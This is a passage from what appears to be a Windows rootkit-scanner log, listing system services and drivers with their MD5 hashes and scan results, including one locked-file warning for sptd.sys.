      22:13:50.0268 2516 Rasl2tp - ok
      22:13:50.0293 2516 [ 6DD5BEE7A2C427DD14798BCB02872A5B ] RasMan C:\Windows\System32\rasmans.dll
      22:13:50.0396 2516 RasMan - ok
      22:13:50.0421 2516 [ 0562406118AD3680CC8759F3EAB3DC8D ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
      22:13:50.0438 2516 RasPppoe - ok
      22:13:50.0455 2516 [ CC516407B26C30DAD6024C1B6716A03B ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
      22:13:50.0460 2516 RasSstp - ok
      22:13:50.0474 2516 [ EED381430C2A96CA759B796CFDDDED47 ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
      22:13:50.0481 2516 rdbss - ok
      22:13:50.0493 2516 [ 73078AE48172CD6618FBB6DEC62ADF95 ] rdpbus C:\Windows\system32\DRIVERS\rdpbus.sys
      22:13:50.0498 2516 rdpbus - ok
      22:13:50.0513 2516 [ 51102C6C0AE6246115A1E7280089B0F3 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
      22:13:50.0518 2516 RDPCDD - ok
      22:13:50.0538 2516 [ 0013A4AFA0E93BAFDD25C60A2E52EFE5 ] RDPDR C:\Windows\system32\drivers\rdpdr.sys
      22:13:50.0547 2516 RDPDR - ok
      22:13:50.0556 2516 [ 3C43E014BD69AA256D832DA02309060B ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
      22:13:50.0561 2516 RDPENCDD - ok
      22:13:50.0576 2516 [ 58E4C6344CE70AE5AB8737EBE335CC4D ] RDPREFMP C:\Windows\system32\drivers\rdprefmp.sys
      22:13:50.0580 2516 RDPREFMP - ok
      22:13:50.0607 2516 [ FF9FB44F19C38F861233E947DA162E77 ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
      22:13:50.0612 2516 RDPWD - ok
      22:13:50.0627 2516 [ E77F18E43117E313F0D0D1F463AFF124 ] rdyboost C:\Windows\system32\drivers\rdyboost.sys
      22:13:50.0634 2516 rdyboost - ok
      22:13:50.0665 2516 [ 06C8C5EB9244C9268983685F7A213739 ] RemoteAccess C:\Windows\System32\mprdim.dll
      22:13:50.0682 2516 RemoteAccess - ok
      22:13:50.0703 2516 [ 495330D6C885BCFD09797278DCC6DC76 ] RemoteRegistry C:\Windows\system32\regsvc.dll
      22:13:50.0754 2516 RemoteRegistry - ok
      22:13:50.0774 2516 [ C406A5185F72C57FA8078A64D23191C2 ] RpcEptMapper C:\Windows\System32\RpcEpMap.dll
      22:13:50.0781 2516 RpcEptMapper - ok
      22:13:50.0801 2516 [ BCBBCFF1743993097FA8780F286F934B ] RpcLocator C:\Windows\system32\locator.exe
      22:13:50.0808 2516 RpcLocator - ok
      22:13:50.0821 2516 [ 0E829890E9E00BBBA3352B02C718CB63 ] RpcSs C:\Windows\system32\rpcss.dll
      22:13:50.0828 2516 RpcSs - ok
      22:13:50.0845 2516 [ 067958CA476698DAD32CBA353BC0C99A ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
      22:13:50.0852 2516 rspndr - ok
      22:13:50.0888 2516 [ 7DFD48E24479B68B258D8770121155A0 ] RTL8167 C:\Windows\system32\DRIVERS\Rt86win7.sys
      22:13:50.0919 2516 RTL8167 - ok
      22:13:50.0938 2516 [ 62ACA5DA2A4B8EBAB323823B5FEDCF04 ] s3cap C:\Windows\system32\DRIVERS\vms3cap.sys
      22:13:50.0966 2516 s3cap - ok
      22:13:50.0979 2516 [ 62C4EF46A710A84416AEA89E52C01833 ] SamSs C:\Windows\system32\lsass.exe
      22:13:50.0982 2516 SamSs - ok
      22:13:50.0997 2516 [ 7DADAA93967CBEE5A5E65537C5D5D6FF ] sbp2port C:\Windows\system32\DRIVERS\sbp2port.sys
      22:13:51.0003 2516 sbp2port - ok
      22:13:51.0020 2516 [ D9044A5CB7B5A4F552C6EE8494EB9A3D ] SCardSvr C:\Windows\System32\SCardSvr.dll
      22:13:51.0037 2516 SCardSvr - ok
      22:13:51.0049 2516 [ C240BFC9F7B7F3A0DBBE1E626CA83498 ] scfilter C:\Windows\system32\DRIVERS\scfilter.sys
      22:13:51.0056 2516 scfilter - ok
      22:13:51.0080 2516 [ F683BE1819C0729B7216325C046DEA0B ] Schedule C:\Windows\system32\schedsvc.dll
      22:13:51.0110 2516 Schedule - ok
      22:13:51.0131 2516 [ CC208724CC5F2CB4CC95791BD5A01E24 ] SCPolicySvc C:\Windows\System32\certprop.dll
      22:13:51.0136 2516 SCPolicySvc - ok
      22:13:51.0152 2516 [ D351E8ABFB6CA57501EB291B7510C723 ] SDRSVC C:\Windows\System32\SDRSVC.dll
      22:13:51.0160 2516 SDRSVC - ok
      22:13:51.0165 2516 [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv C:\Windows\system32\drivers\secdrv.sys
      22:13:51.0170 2516 secdrv - ok
      22:13:51.0179 2516 [ 6507A5E211E4E1DE3AAB575B70740C3D ] seclogon C:\Windows\system32\seclogon.dll
      22:13:51.0182 2516 seclogon - ok
      22:13:51.0195 2516 [ B8B44DF92D7750A2009375EBF28E3004 ] SENS C:\Windows\System32\sens.dll
      22:13:51.0200 2516 SENS - ok
      22:13:51.0214 2516 [ 9B7B29004D870DE67DFE83BFB154B14A ] SensrSvc C:\Windows\system32\sensrsvc.dll
      22:13:51.0221 2516 SensrSvc - ok
      22:13:51.0256 2516 [ CF2FA9458AAE5DEA5FC6BC34DA0E4E2B ] Serenum C:\Windows\system32\DRIVERS\serenum.sys
      22:13:51.0264 2516 Serenum - ok
      22:13:51.0276 2516 [ 7861141D6C20FF3A1D8E8FF21DE8C193 ] Serial C:\Windows\system32\DRIVERS\serial.sys
      22:13:51.0282 2516 Serial - ok
      22:13:51.0292 2516 [ BB9ED1B01FB200D6C20B09C2ECC861FE ] sermouse C:\Windows\system32\DRIVERS\sermouse.sys
      22:13:51.0297 2516 sermouse - ok
      22:13:51.0322 2516 [ F90D8D337B9DCAD6EFE5CA00F0699BE1 ] SessionEnv C:\Windows\system32\sessenv.dll
      22:13:51.0326 2516 SessionEnv - ok
      22:13:51.0336 2516 [ 69D32BE754489D319A8C3E83410D8464 ] sffdisk C:\Windows\system32\DRIVERS\sffdisk.sys
      22:13:51.0341 2516 sffdisk - ok
      22:13:51.0353 2516 [ D68CAEA34B2D20A26435B693C7119932 ] sffp_mmc C:\Windows\system32\DRIVERS\sffp_mmc.sys
      22:13:51.0358 2516 sffp_mmc - ok
      22:13:51.0369 2516 [ 6E7E854B6E8378FC628C78852DE87A15 ] sffp_sd C:\Windows\system32\DRIVERS\sffp_sd.sys
      22:13:51.0375 2516 sffp_sd - ok
      22:13:51.0381 2516 [ FBAADF5A1DFC270B6B553596E9FFBCA4 ] sfloppy C:\Windows\system32\DRIVERS\sfloppy.sys
      22:13:51.0386 2516 sfloppy - ok
      22:13:51.0421 2516 [ 5C73BAFCF18C1AB78C8607825C23842A ] SharedAccess C:\Windows\System32\ipnathlp.dll
      22:13:51.0448 2516 SharedAccess - ok
      22:13:51.0482 2516 [ 131C42DBFC9B390E7EDF85D8B2005A43 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
      22:13:51.0491 2516 ShellHWDetection - ok
      22:13:51.0514 2516 [ 0D27454879B0981F5838022AE140CB59 ] sisagp C:\Windows\system32\DRIVERS\sisagp.sys
      22:13:51.0520 2516 sisagp - ok
      22:13:51.0532 2516 [ 2F199E7334D5AA5D8DF6CAF8BDD20ECE ] SiSRaid2 C:\Windows\system32\DRIVERS\SiSRaid2.sys
      22:13:51.0542 2516 SiSRaid2 - ok
      22:13:51.0552 2516 [ 317FFB05894089AA3EC0BDE66FFF46B1 ] SiSRaid4 C:\Windows\system32\DRIVERS\sisraid4.sys
      22:13:51.0557 2516 SiSRaid4 - ok
      22:13:51.0577 2516 [ F3B32077BA0BE7CD6C848AB1752394CE ] Smb C:\Windows\system32\DRIVERS\smb.sys
      22:13:51.0582 2516 Smb - ok
      22:13:51.0627 2516 [ E6EF03780E42F3A05DBAA987CA0BD29C ] SNMPTRAP C:\Windows\System32\snmptrap.exe
      22:13:51.0652 2516 SNMPTRAP - ok
      22:13:51.0667 2516 [ 51BC86DCFC712D7ED29753BCDCE687E9 ] spldr C:\Windows\system32\drivers\spldr.sys
      22:13:51.0672 2516 spldr - ok
      22:13:51.0692 2516 [ BF197280C152DE799B283575773D5FD7 ] Spooler C:\Windows\System32\spoolsv.exe
      22:13:51.0697 2516 Spooler - ok
      22:13:51.0787 2516 [ 7D3AD0594E4CE6F311637761A3E146DA ] sppsvc C:\Windows\system32\sppsvc.exe
      22:13:51.0817 2516 sppsvc - ok
      22:13:51.0822 2516 [ 06D9FFCE1E3ECD909D1D0FC865CE04FD ] sppuinotify C:\Windows\system32\sppuinotify.dll
      22:13:51.0827 2516 sppuinotify - ok
      22:13:51.0887 2516 [ 614DEEA4BDCEC3FD5A07BDC705723AD7 ] sptd C:\Windows\System32\Drivers\sptd.sys
      22:13:51.0892 2516 Suspicious file (NoAccess): C:\Windows\System32\Drivers\sptd.sys. md5: 614DEEA4BDCEC3FD5A07BDC705723AD7
      22:13:51.0892 2516 sptd ( LockedFile.Multi.Generic ) - warning
      22:13:51.0892 2516 sptd - detected LockedFile.Multi.Generic (1)
      22:13:51.0917 2516 [ B64A37F41A2A5D6B8139546D37E3AF42 ] srv C:\Windows\system32\DRIVERS\srv.sys
      22:13:51.0937 2516 srv - ok
      22:13:51.0977 2516 [ 5BE6B13C99AAF7C2798F2A58616BD0EA ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
      22:13:51.0982 2516 srv2 - ok
      22:13:51.0992 2516 [ A2634BDA920BDF2B61E298CDBE5A0137 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
      22:13:51.0997 2516 srvnet - ok
      22:13:52.0032 2516 [ 64E44ACD8C238FCBBB78F0BA4BDC4B05 ] ssadbus C:\Windows\system32\DRIVERS\ssadbus.sys
      22:13:52.0072 2516 ssadbus - ok
      22:13:52.0102 2516 [ BB2C84A15C765DA89FD832B0E73F26CE ] ssadmdfl C:\Windows\system32\DRIVERS\ssadmdfl.sys
      22:13:52.0127 2516 ssadmdfl - ok
      22:13:52.0172 2516 [ 6D0D132DDC6F43EDA00DCED6D8B1CA31 ] ssadmdm C:\Windows\system32\DRIVERS\ssadmdm.sys
      22:13:52.0222 2516 ssadmdm - ok
      22:13:52.0252 2516 [ 069351A1D7D291013177A90AE6EDCCBC ] sscdbus C:\Windows\system32\DRIVERS\sscdbus.sys
      22:13:52.0267 2516 sscdbus - ok
      22:13:52.0292 2516 [ 1C925BE223A5C0F9F469252292A48DF6 ] sscdmdfl C:\Windows\system32\DRIVERS\sscdmdfl.sys
      22:13:52.0307 2516 sscdmdfl - ok
      22:13:52.0327 2516 [ AE3E77AE0FBDB07EB1AC3FED74A0695E ] sscdmdm C:\Windows\system32\DRIVERS\sscdmdm.sys
      22:13:52.0362 2516 sscdmdm - ok
      22:13:52.0397 2516 [ 3566A8B5C9DEC0ACFAC0EFFA1334F707 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
      22:13:52.0407 2516 SSDPSRV - ok
      22:13:52.0422 2516 [ F73FD0235DD2F9CFB955F95F6ACCB05D ] SstpSvc C:\Windows\system32\sstpsvc.dll
      22:13:52.0432 2516 SstpSvc - ok
      22:13:52.0492 2516 [ 8D01686AE82B466F4CD074F31F2942CA ] Stereo Service C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
      22:13:52.0502 2516 Stereo Service - ok
      22:13:52.0517 2516 [ 63D94515F23994DACD2C013BD38FE85A ] stexstor C:\Windows\system32\DRIVERS\stexstor.sys
      22:13:52.0522 2516 stexstor - ok
      22:13:52.0542 2516 [ 5247FFB9C789E89F17FC566B22800766 ] StiSvc C:\Windows\System32\wiaservc.dll
      22:13:52.0562 2516 StiSvc - ok
      22:13:52.0592 2516 [ D7FC0C1CA99C0C2D12EDB6B291501716 ] storflt C:\Windows\system32\DRIVERS\vmstorfl.sys
      22:13:52.0597 2516 storflt - ok
      22:13:52.0617 2516 [ 39DBC657C06184F2D8928722814463BE ] storvsc C:\Windows\system32\DRIVERS\storvsc.sys
      22:13:52.0637 2516 storvsc - ok
      22:13:52.0642 2516 [ DF6022C8E28D896EA760CE83990D351D ] swenum C:\Windows\system32\DRIVERS\swenum.sys
      22:13:52.0647 2516 swenum - ok
      22:13:52.0798 2516 [ F577910A133A592234EBAAD3F3AFA258 ] SwitchBoard C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
      22:13:52.0811 2516 SwitchBoard - ok
      22:13:52.0839 2516 [ 6E737CDCBAEDF1ECE23008006C7D5D56 ] swprv C:\Windows\System32\swprv.dll
      22:13:52.0856 2516 swprv - ok
      22:13:52.0911 2516 sysaidagent - ok
      22:13:52.0945 2516 [ 319CD0F6C7E5D67CD2DA7BBFBE40DBA4 ] SysMain C:\Windows\system32\sysmain.dll
      22:13:52.0972 2516 SysMain - ok
      22:13:52.0989 2516 [ 09746CE866FA24CAA272895032BF5321 ] TabletInputService C:\Windows\System32\TabSvc.dll
      22:13:53.0006 2516 TabletInputService - ok
      22:13:53.0028 2516 [ 3457C873A024054E9E4C44A803D15C4A ] TapiSrv C:\Windows\System32\tapisrv.dll
      22:13:53.0046 2516 TapiSrv - ok
      22:13:53.0059 2516 [ 000106A912AD243F952BC9FB1F148894 ] TBS C:\Windows\System32\tbssvc.dll
      22:13:53.0064 2516 TBS - ok
      22:13:53.0096 2516 [ 4EB1831B5C67AFF9CFFA5269A3905505 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
      22:13:53.0129 2516 Tcpip - ok
      22:13:53.0170 2516 [ 4EB1831B5C67AFF9CFFA5269A3905505 ] TCPIP6 C:\Windows\system32\DRIVERS\tcpip.sys
      22:13:53.0178 2516 TCPIP6 - ok
      22:13:53.0185 2516 [ 0170BFD116D6558AAC26F6CC0F8449EE ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
      22:13:53.0188 2516 tcpipreg - ok
      22:13:53.0202 2516 [ C7DAEB5D031852527CEB793060B828AE ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
      22:13:53.0210 2516 TDPIPE - ok
      22:13:53.0230 2516 [ DAB2F3AC2969A501213B1E3A1E007C72 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
      22:13:53.0238 2516 TDTCP - ok
      22:13:53.0252 2516 [ 890765BBEE701E758E35BF8E2EF1857C ] tdx C:\Windows\system32\DRIVERS\tdx.sys
      22:13:53.0261 2516 tdx - ok
      22:13:53.0280 2516 [ E7E96BE4914A6DCDF1ED6E2081362CE4 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
      22:13:53.0303 2516 TermDD - ok
      22:13:53.0344 2516 [ C731DD82FA13F5C1F6D7F9408008448F ] TermService C:\Windows\System32\termsrv.dll
      22:13:53.0352 2516 TermService - ok
      22:13:53.0366 2516 [ 94023D02EEC1498A9C71A7AED48F539E ] Themes C:\Windows\system32\themeservice.dll
      22:13:53.0369 2516 Themes - ok
      22:13:53.0378 2516 [ C93856D7B07CA30B7B451CCDE12CF873 ] THREADORDER C:\Windows\system32\mmcss.dll
      22:13:53.0382 2516 THREADORDER - ok
      22:13:53.0392 2516 [ C1F675E0C42FBE2E5B8510398E609DA2 ] TrkWks C:\Windows\System32\trkwks.dll
      22:13:53.0396 2516 TrkWks - ok
      22:13:53.0451 2516 [ 4024A2EBD2E265DD093FABC775D79056 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
      22:13:53.0475 2516 TrustedInstaller - ok
      22:13:53.0494 2516 [ 08063D8CA891B2A9D3C9CAE14545D604 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
      22:13:53.0502 2516 tssecsrv - ok
      22:13:53.0522 2516 [ 8BF40BED3FFA9BEF8C1940A3791268FF ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
      22:13:53.0527 2516 tunnel - ok
      22:13:53.0539 2516 [ A6EA1C98AE00FB7146CD75C34C456196 ] uagp35 C:\Windows\system32\DRIVERS\uagp35.sys
      22:13:53.0543 2516 uagp35 - ok
      22:13:53.0559 2516 [ E7E2E29E829BA45B60786DCF397B187B ] udfs C:\Windows\system32\DRIVERS\udfs.sys
      22:13:53.0573 2516 udfs - ok
      22:13:53.0593 2516 [ C454C20BFD173BE47D2D1E4ADADF6BDD ] UI0Detect C:\Windows\system32\UI0Detect.exe
      22:13:53.0624 2516 UI0Detect - ok
      22:13:53.0663 2516 [ 47EFFDBE173AC5AE56D1F2F3354269AE ] uliagpkx C:\Windows\system32\DRIVERS\uliagpkx.sys
      22:13:53.0668 2516 uliagpkx - ok
      22:13:53.0685 2516 [ BEEB0013A4BACFF04A250E1EE144A317 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
      22:13:53.0696 2516 umbus - ok
      22:13:53.0711 2516 [ 5F7F103E240A6464D532B4090C897C93 ] UmPass C:\Windows\system32\DRIVERS\umpass.sys
      22:13:53.0719 2516 UmPass - ok
      22:13:53.0763 2516 [ 64CE528A4BA316F14D443C63994DFA12 ] UmRdpService C:\Windows\System32\umrdp.dll
      22:13:53.0788 2516 UmRdpService - ok
      22:13:53.0818 2516 [ 2004068AB5045271C5520F5CD254B935 ] upnphost C:\Windows\System32\upnphost.dll
      22:13:53.0823 2516 upnphost - ok
      22:13:53.0843 2516 [ 377A860798C291A032AFDBC8039B0188 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
      22:13:53.0853 2516 usbccgp - ok
      22:13:53.0878 2516 [ 640A8D954FC6E04B93F0A0A95F7DA145 ] usbcir C:\Windows\system32\DRIVERS\usbcir.sys
      22:13:53.0883 2516 usbcir - ok
      22:13:53.0898 2516 [ 9CFC87D59D71920A3249CB971ED13E8E ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
      22:13:53.0903 2516 usbehci - ok
      22:13:53.0983 2516 [ 23BDE1EFE718BB471EB663B40E0EC472 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
      22:13:54.0013 2516 usbhub - ok
      22:13:54.0058 2516 [ 9256702AA6C353EE79F05D76A030B059 ] usbohci C:\Windows\system32\DRIVERS\usbohci.sys
      22:13:54.0078 2516 usbohci - ok
      22:13:54.0109 2516 [ 284947FB10AA17D7FA8BAF8171D4E2D0 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
      22:13:54.0118 2516 usbprint - ok
      22:13:54.0147 2516 [ FAC2B913C560833B3F2D90C384862B83 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
      22:13:54.0172 2516 usbscan - ok
      22:13:54.0192 2516 [ F499B234ABEF64AE74F49017D239F869 ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
      22:13:54.0199 2516 USBSTOR - ok
      22:13:54.0209 2516 [ A3C059DF87935DF5594FA4A2AF1021ED ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
      22:13:54.0215 2516 usbuhci - ok
      22:13:54.0233 2516 [ 31298BFA1D5D4376CED85AF1B4FE17E2 ] UxSms C:\Windows\System32\uxsms.dll
      22:13:54.0236 2516 UxSms - ok
      22:13:54.0254 2516 [ 62C4EF46A710A84416AEA89E52C01833 ] VaultSvc C:\Windows\system32\lsass.exe
      22:13:54.0256 2516 VaultSvc - ok
      22:13:54.0278 2516 [ B5B5E2A18CBEDC1DD61E40F21F00213B ] vdrvroot C:\Windows\system32\DRIVERS\vdrvroot.sys
      22:13:54.0282 2516 vdrvroot - ok
      22:13:54.0305 2516 [ E95EABEA8E555D1EDDDCFB15B26E06EE ] vds C:\Windows\System32\vds.exe
      22:13:54.0311 2516 vds - ok
      22:13:54.0338 2516 [ DA332C7F0C9B7CAEC2D09F87689574AA ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
      22:13:54.0344 2516 vga - ok
      22:13:54.0378 2516 [ 7531D05C60B312963E8242BFC2A2DB43 ] VgaSave C:\Windows\System32\drivers\vga.sys
      22:13:54.0386 2516 VgaSave - ok
      22:13:54.0434 2516 [ 3BAA3E8C5CE25587808C98A984731750 ] vhdmp C:\Windows\system32\DRIVERS\vhdmp.sys
      22:13:54.0455 2516 vhdmp - ok
      22:13:54.0483 2516 [ A6F20C29AF56AF5135C321B83D9A0CD6 ] viaagp C:\Windows\system32\DRIVERS\viaagp.sys
      22:13:54.0489 2516 viaagp - ok
      22:13:54.0506 2516 [ 4E5FFE098CCD24379EE03E415B2637C6 ] ViaC7 C:\Windows\system32\DRIVERS\viac7.sys
      22:13:54.0512 2516 ViaC7 - ok
      22:13:54.0529 2516 [ E7FE0D0691708C8CEE8725211F634E61 ] viaide C:\Windows\system32\DRIVERS\viaide.sys
      22:13:54.0534 2516 viaide - ok
      22:13:54.0564 2516 [ 8752DB3BEAC56F4C30C5F8DEDD057F1E ] vmbus C:\Windows\system32\DRIVERS\vmbus.sys
      22:13:54.0581 2516 vmbus - ok
      22:13:54.0596 2516 [ D2AA31DD936099F9694CAC96492C746E ] VMBusHID C:\Windows\system32\DRIVERS\VMBusHID.sys
      22:13:54.0603 2516 VMBusHID - ok
      22:13:54.0615 2516 [ 54A999F5A4F9C166DE86BACC0FE3A992 ] volmgr C:\Windows\system32\DRIVERS\volmgr.sys
      22:13:54.0619 2516 volmgr - ok
      22:13:54.0632 2516 [ BED15F4120480452FC924D216A38DA67 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
      22:13:54.0648 2516 volmgrx - ok
      22:13:54.0668 2516 [ 803F111D3DBA35D34DE1F0AC12517DE8 ] volsnap C:\Windows\system32\DRIVERS\volsnap.sys
      22:13:54.0674 2516 volsnap - ok
      22:13:54.0712 2516 [ 013A033EF110AF1AC145F13BAD8592AF ] vsmraid C:\Windows\system32\DRIVERS\vsmraid.sys
      22:13:54.0763 2516 vsmraid - ok
      22:13:54.0804 2516 [ B593871B748F4C2F246FEEFDA1D04939 ] VSS C:\Windows\system32\vssvc.exe
      22:13:54.0815 2516 VSS - ok
      22:13:54.0821 2516 [ 56021863CAA995A086BFDDB659D91A84 ] vwifibus C:\Windows\System32\drivers\vwifibus.sys
      22:13:54.0825 2516 vwifibus - ok
      22:13:54.0843 2516 [ 6FAAC3E3EB2BBAFE3881C457FB02790B ] W32Time C:\Windows\system32\w32time.dll
      22:13:54.0851 2516 W32Time - ok
      22:13:54.0952 2516 [ 579852304F57DD6891362228E057A08E ] W3SVC C:\Windows\system32\inetsrv\iisw3adm.dll
      22:13:54.0975 2516 W3SVC - ok
      22:13:54.0994 2516 [ A7088FA2F8904AAEBF81943469AF590C ] WacomPen C:\Windows\system32\DRIVERS\wacompen.sys
      22:13:55.0000 2516 WacomPen - ok
      22:13:55.0023 2516 [ 60DB77528322077833FB048FAF66BB81 ] WANARP C:\Windows\system32\DRIVERS\wanarp.sys
      22:13:55.0029 2516 WANARP - ok
      22:13:55.0038 2516 [ 60DB77528322077833FB048FAF66BB81 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
      22:13:55.0040 2516 Wanarpv6 - ok
      22:13:55.0098 2516 [ 579852304F57DD6891362228E057A08E ] WAS C:\Windows\system32\inetsrv\iisw3adm.dll
      22:13:55.0102 2516 WAS - ok
      22:13:55.0570 2516 [ B0CF2A7E992CE86E822F99063F004FD7 ] wbengine C:\Windows\system32\wbengine.exe
      22:13:55.0607 2516 wbengine - ok
      22:13:55.0638 2516 [ 1A57CF6CF234C7F18EE208F207C001D9 ] WbioSrvc C:\Windows\System32\wbiosrvc.dll
      22:13:55.0646 2516 WbioSrvc - ok
      22:13:55.0658 2516 [ 95534CEC9D3851D4389701697D32CE58 ] wcncsvc C:\Windows\System32\wcncsvc.dll
      22:13:55.0676 2516 wcncsvc - ok
      22:13:55.0681 2516 [ 5953DD81F64F63376E016E2D0B8AF7AF ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
      22:13:55.0687 2516 WcsPlugInService - ok
      22:13:55.0698 2516 [ 3792FEC814984456C0E613E2371AA09B ] Wd C:\Windows\system32\DRIVERS\wd.sys
      22:13:55.0750 2516 Wd - ok
      22:13:55.0774 2516 [ 6D77FF2224D2D3984760ACBDF4024A7B ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
      22:13:55.0792 2516 Wdf01000 - ok
      22:13:55.0799 2516 [ EA74F16E30F11AD8E2A6B16324102BB9 ] WdiServiceHost C:\Windows\system32\wdi.dll
      22:13:55.0805 2516 WdiServiceHost - ok
      22:13:55.0810 2516 [ EA74F16E30F11AD8E2A6B16324102BB9 ] WdiSystemHost C:\Windows\system32\wdi.dll
      22:13:55.0814 2516 WdiSystemHost - ok
      22:13:55.0821 2516 [ 8E4355AE3067A9AF4BD60A319F457C81 ] WebClient C:\Windows\System32\webclnt.dll
      22:13:55.0828 2516 WebClient - ok
      22:13:55.0835 2516 [ 22A4C39F275025F7AFD9A11FDCFC9F29 ] Wecsvc C:\Windows\system32\wecsvc.dll
      22:13:55.0842 2516 Wecsvc - ok
      22:13:55.0856 2516 [ 63D184936C3F6615982415BD01EBE67E ] wercplsupport C:\Windows\System32\wercplsupport.dll
      22:13:55.0861 2516 wercplsupport - ok
      22:13:55.0882 2516 [ E2773587982476DD5B5744C4DF297018 ] WerSvc C:\Windows\System32\WerSvc.dll
      22:13:55.0899 2516 WerSvc - ok
      22:13:55.0916 2516 [ CD2DBAA438F0A01BB82101F56ECE5B6E ] WfpLwf C:\Windows\system32\DRIVERS\wfplwf.sys
      22:13:55.0921 2516 WfpLwf - ok
      22:13:55.0931 2516 [ FCBEAE96A408C8F2E0B94BE2AB712864 ] WIMMount C:\Windows\system32\drivers\wimmount.sys
      22:13:55.0936 2516 WIMMount - ok
      22:13:55.0987 2516 [ 596234DFAEABD61D4AC9BC19E5D20DFD ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
      22:13:55.0995 2516 Winmgmt - ok
      22:13:56.0056 2516 [ F194AB265D86DF54453DDD4478EE34DE ] WinRM C:\Windows\system32\WsmSvc.dll
      22:13:56.0103 2516 WinRM - ok
      22:13:56.0145 2516 [ 7EF1FF64EC9C280F3342F22CC48513A2 ] WinUsb C:\Windows\system32\DRIVERS\WinUsb.sys
      22:13:56.0180 2516 WinUsb - ok
      22:13:56.0215 2516 [ 2B9225D627AECB9152AC5B2ADB4F4E11 ] Wlansvc C:\Windows\System32\wlansvc.dll
      22:13:56.0250 2516 Wlansvc - ok
      22:13:56.0260 2516 [ 02B1FBFD9828986BF73051CBE6F7ACCC ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
      22:13:56.0265 2516 WmiAcpi - ok
      22:13:56.0295 2516 [ 916688210A461CA88A09D7D271185E9F ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
      22:13:56.0300 2516 wmiApSrv - ok
      22:13:56.0355 2516 [ 865BC1B77DA7A12B07C2DD70D1427A40 ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
      22:13:56.0365 2516 WMPNetworkSvc - ok
      22:13:56.0401 2516 [ 520F8AE4641390013D0246AF0DCF1089 ] WPCSvc C:\Windows\System32\wpcsvc.dll
      22:13:56.0407 2516 WPCSvc - ok
      22:13:56.0440 2516 [ 470E5279C5C552CFDC9B170C28BFC0E1 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
      22:13:56.0449 2516 WPDBusEnum - ok
      22:13:56.0469 2516 [ 2482D8B39E0010AD1BB2EA08703E4783 ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
      22:13:56.0475 2516 ws2ifsl - ok
      22:13:56.0480 2516 WSearch - ok
      22:13:56.0535 2516 [ D598DCD9CDF64336377B6A84F1B63608 ] wuauserv C:\Windows\system32\wuaueng.dll
      22:13:56.0569 2516 wuauserv - ok
      22:13:56.0585 2516 [ 586BC56459B6E4A3A9CBDDB9A117AEF5 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
      22:13:56.0590 2516 WudfPf - ok
      22:13:56.0617 2516 [ F29B56BC536289E05CB01E36F5C7F6BA ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
      22:13:56.0636 2516 WUDFRd - ok
      22:13:56.0664 2516 [ 2C5330D73ACB59242DBBD0489D40DAD5 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
      22:13:56.0673 2516 wudfsvc - ok
      22:13:56.0692 2516 [ F366BE88D3DE8F8BA0A45D70817B47F4 ] WwanSvc C:\Windows\System32\wwansvc.dll
      22:13:56.0710 2516 WwanSvc - ok
      22:13:56.0726 2516 ================ Scan global ===============================
      22:13:56.0757 2516 [ 17B2B90E90D8E9DACB20CD14AD7AF480 ] C:\Windows\system32\basesrv.dll
      22:13:56.0789 2516 [ 0EDE23A3639AB9B78F8A15BC6B34F2CA ] C:\Windows\system32\winsrv.dll
      22:13:56.0823 2516 [ 0EDE23A3639AB9B78F8A15BC6B34F2CA ] C:\Windows\system32\winsrv.dll
      22:13:56.0857 2516 [ 0036FB155FF5D40319CE79EF4284DFE4 ] C:\Windows\system32\sxssrv.dll
      22:13:56.0893 2516 [ 77474E495E99CCE05AD2720E6FA85A35 ] C:\Windows\system32\services.exe
      22:13:56.0902 2516 [Global] - ok
      22:13:56.0902 2516 ================ Scan MBR ==================================
      22:13:56.0910 2516 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
      22:13:57.0112 2516 \Device\Harddisk0\DR0 - ok
      22:13:57.0120 2516 [ CC147E5132DE48991B3718A6DFE99EAE ] \Device\Harddisk1\DR1
      22:13:57.0128 2516 \Device\Harddisk1\DR1 - ok
      22:13:57.0135 2516 [ F1EC47C8E120F9955EDB9990DECBEAE0 ] \Device\Harddisk2\DR2
